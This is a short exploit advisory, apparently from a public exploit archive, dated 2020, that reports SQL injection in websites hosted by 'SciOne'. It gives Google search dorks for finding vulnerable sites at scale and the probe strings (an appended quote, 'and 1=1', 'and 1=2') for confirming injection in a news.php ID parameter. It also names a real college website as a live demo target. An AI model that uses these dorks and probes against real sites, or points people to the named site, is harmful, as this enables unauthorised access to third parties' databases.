[+] Title: SciOne" SQL Injection
[+] Author: h4shur
[+] date:2020-11-08
[+] Vendor Homepage: https://scione.com/
[+] Software Link: https://scione.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Category : Web Application Bugs
[+} Dork : intext:"Hosted by SciOne"
intext:"Hosted by SciOne" inurl:"NEWS.php?ID="
intext:"Hosted by SciOne" inurl:"php?ID="
### Note:
[+] Add the quotation mark (') to the end of the link :
* Target.com/news.php?ID=4'
[+] First add "and 1=1" and then "and 1=2" to the end of the link :
* Target.com/news.php?ID=4 and 1=1
* Target.com/news.php?ID=4 and 1=2
### Demo:
[+] https://acecollege.edu.pk/ajer/news.php?id=39
### Contact Me :
* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r